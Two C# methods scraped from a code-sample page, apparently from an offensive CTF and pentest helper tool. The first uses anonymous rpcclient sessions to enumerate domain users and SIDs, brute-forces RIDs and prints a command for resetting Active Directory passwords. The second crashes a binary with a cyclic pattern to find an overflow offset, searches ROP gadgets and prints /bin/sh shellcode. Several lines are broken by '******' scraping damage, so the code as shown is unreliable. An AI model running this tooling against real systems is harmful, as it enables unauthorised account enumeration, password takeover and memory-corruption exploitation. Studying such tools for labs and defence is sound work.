Beispiel #1
0
        private static string GetRPCInfo(string ip)
        {
            string rpcInfo    = "";
            bool   anonAccess = false;

            if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
                {
                    // Find the Domain Name
                    List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
                    domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
                    if (domainNameList.Count == 1)
                    {
                        anonAccess = true;
                        rpcInfo   += "- " + domainNameList[0] + Environment.NewLine;
                    }

                    // Find basic users
                    List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
                    if (enumdomusersList.Count == 0)
                    {
                        List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
                        if (srvinfoList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
                        }

                        // Find public SIDs with lsaenumsid
                        List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
                        if (sidList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- Found SIDs" + Environment.NewLine;
                            // Remove the "found X SIDs" text
                            sidList.RemoveAll(x => x.StartsWith("found "));

                            // Remove blanks
                            sidList.RemoveAll(x => string.IsNullOrEmpty(x));

                            string sidListString = string.Join(' ', sidList);

                            // Enumerate the rest
                            List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
                            if (sidResolution.Count != 0)
                            {
                                foreach (string result in sidResolution)
                                {
                                    rpcInfo += "-- " + result + Environment.NewLine;
                                }
                            }
                        }

                        // Find sneaky SIDs
                        List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
                        sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
                                    if (!sneakySIDBaseList.Contains(sneakySIDBase))
                                    {
                                        sneakySIDBaseList.Add(sneakySIDBase);
                                    }
                                }
                            }

                            if (sneakySIDBaseList.Count != 0)
                            {
                                List <string> sneakySIDList = new List <string>();
                                foreach (string sneakyBase in sneakySIDBaseList)
                                {
                                    // Low ones are just system names - Can ignore them - Proper ones start from 1000
                                    sneakySIDList.Add(sneakyBase + "1000");
                                    sneakySIDList.Add(sneakyBase + "1001");
                                    sneakySIDList.Add(sneakyBase + "1002");
                                    sneakySIDList.Add(sneakyBase + "1003");
                                    sneakySIDList.Add(sneakyBase + "1004");
                                    sneakySIDList.Add(sneakyBase + "1005");
                                    sneakySIDList.Add(sneakyBase + "1006");
                                    sneakySIDList.Add(sneakyBase + "1007");
                                    sneakySIDList.Add(sneakyBase + "1008");
                                    sneakySIDList.Add(sneakyBase + "1009");
                                    sneakySIDList.Add(sneakyBase + "1010");
                                    List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
                                    if (sneakySIDLookup.Count != 0)
                                    {
                                        foreach (string lookupResult in sneakySIDLookup)
                                        {
                                            string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));

                                            name = name.Remove(0, name.LastIndexOf("\\") + 1);

                                            // Invalid ones simply have the number itself instead of the name
                                            // A bit hacky, but it works
                                            if (!int.TryParse(name, out int toIgnore))
                                            {
                                                rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                    else // Count > 0
                    {
                        string firstItem = enumdomusersList[0];
                        if (firstItem.Contains("user:"******"rid:"))
                        {
                            // All is fine
                            if (enumdomusersList.Count >= 3)
                            {
                                Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
                            }
                            rpcInfo = "- User Listing" + Environment.NewLine;
                            foreach (string user in enumdomusersList)
                            {
                                rpcInfo += QueryEnumDomUser(ip, user);
                            }
                            // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                            rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
                        {
                            rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT")
                        {
                            rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED")
                        {
                            rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
                        }
                        else
                        {
                            foreach (string item in enumdomusersList)
                            {
                                Console.WriteLine("Debug Info item: " + item);
                            }
                            rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
                        }
                    }
                    if (anonAccess == true)
                    {
                        rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
                    }
                    else
                    {
                        rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
                        // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                        rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                    }
                }
                else
                {
                    rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
                }
            }
            else
            {
                rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
            }
            return(rpcInfo);
        }
Beispiel #2
0
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            Architecture architecture = IDElf(fileName);

            if (architecture == Architecture.x86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                if (General.IsInstalledOnLinux("pwn"))
                {
                    General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                    List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                    foreach (string item in dmesgOutput)
                    {
                        //  segfault at 6161616c ip 000000006161616c x
                        if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                        {
                            // Console.WriteLine("-- Item: " + item);
                            string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
                            // Console.WriteLine("-- segfaultHex: " + segfaultHex);
                            string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
                            // Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
                            string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
                            Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
                }
            }
            else if (architecture == Architecture.x64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        if (pwnItem.Length == 18) // x64
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();;
                        pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                        if (pwnItem.Length == 18)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                    }
                }
                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        if (pwnItem.Length == 10)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
            }
            if (General.IsInstalledOnLinux("rabin2"))
            {
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                foreach (string item in rabin2Output)
                {
                    if (item.Trim().StartsWith("nx") && item.Contains("false"))
                    {
                        Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                        if (architecture == Architecture.x64)
                        {
                            Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Bug Reelix to fix his code!");
                        }
                    }
                    else if (item.Trim().StartsWith("nx") && item.Contains("true"))
                    {
                        Console.WriteLine("- nx is enabled - No custom shellcode for you!");
                    }
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed - Skipping nx check");
            }
            if (General.IsInstalledOnLinux("objdump"))
            {
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                }

                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }